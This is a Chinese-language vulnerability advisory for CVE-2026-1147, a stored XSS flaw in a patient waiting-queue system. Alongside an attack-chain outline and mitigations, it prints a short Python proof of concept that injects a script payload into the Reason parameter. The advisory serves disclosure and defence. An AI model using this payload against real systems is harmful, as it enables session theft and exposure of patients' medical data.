CVE-2026-1147 CVSS 3.5 低危

CVE-2026-1147 Patients Waiting Area Queue Management System XSS漏洞

披露日期: 2026-01-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1147

漏洞类型

XSS跨站脚本攻击

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0

漏洞概述

CVE-2026-1147是存在于SourceCodester Patients Waiting Area Queue Management System 1.0版本中的一个存储型跨站脚本(XSS)漏洞。该系统是一款用于医院或诊所管理患者等待队列的管理软件。漏洞存在于/php/api_patient_schedule.php文件中，具体是Reason参数未对用户输入进行充分的过滤和转义处理。攻击者可以通过构造恶意的JavaScript脚本并将其注入到Reason参数中，当其他用户访问相关页面时，恶意脚本将被执行，从而窃取用户会话Cookie、劫持用户账户或进行其他恶意操作。由于该漏洞需要低权限用户交互才能触发，且CVSS评分仅为3.5，因此被评定为低危漏洞。但对于处理敏感医疗信息的系统来说，任何安全漏洞都不应被忽视。

技术细节

该漏洞为存储型XSS（Stored XSS）漏洞，攻击者通过向/php/api_patient_schedule.php接口的Reason参数注入恶意JavaScript代码。由于后端程序未对用户输入进行HTML实体编码或输入验证，恶意脚本会被永久存储在数据库中。当其他用户（如管理员或医护人员）查看患者预约记录或相关报表时，浏览器会解析并执行这些恶意脚本。攻击者可利用此漏洞获取受害者的会话令牌，冒充合法用户进行操作，或窃取患者隐私信息。漏洞利用条件包括：攻击者需拥有系统低权限账户，能够调用API接口提交患者预约数据，且需要诱导其他用户访问包含恶意脚本的页面。

攻击链分析

STEP 1

步骤1

攻击者获取Patients Waiting Area Queue Management System的低权限账户

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的请求，向/php/api_patient_schedule.php的Reason参数注入XSS payload

STEP 3

步骤3

恶意脚本被存储到数据库中，永久存在于系统中

STEP 4

步骤4

其他用户（管理员或医护人员）访问患者预约相关页面

STEP 5

步骤5

受害者浏览器解析页面时执行恶意脚本，攻击者获取用户会话Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-1147 XSS PoC - Patients Waiting Area Queue Management System
import requests
import json

target_url = "http://target.com/php/api_patient_schedule.php"

# Malicious XSS payload in Reason parameter
payload = {
    "patient_id": "12345",
    "schedule_date": "2026-01-20",
    "Reason": "<script>alert(document.cookie)</script>",
    "priority": "normal"
}

# Send malicious request
response = requests.post(target_url, data=payload)

print("PoC for CVE-2026-1147")
print(f"Target: {target_url}")
print(f"Payload: {payload['Reason']}")
print(f"Response Status: {response.status_code}")

影响范围

Patients Waiting Area Queue Management System 1.0

防御指南

临时缓解措施

在等待官方修复期间，可临时采取以下措施：对/php/api_patient_schedule.php文件中的Reason参数添加输入过滤逻辑，使用htmlspecialchars()或strip_tags()函数对用户输入进行转义处理；启用HTTPOnly和Secure标志保护Cookie；配置严格的内容安全策略(CSP)；限制低权限用户的API调用权限；增加日志监控及时发现异常请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1147
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1147
3 Details https://www.cvedetails.com/cve/CVE-2026-1147/
4 VulDB https://vuldb.com/cve/CVE-2026-1147
5 Link https://vuldb.com/?ctiid.341740
6 Link https://vuldb.com/?id.341740
7 Link https://vuldb.com/?submit.735544

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表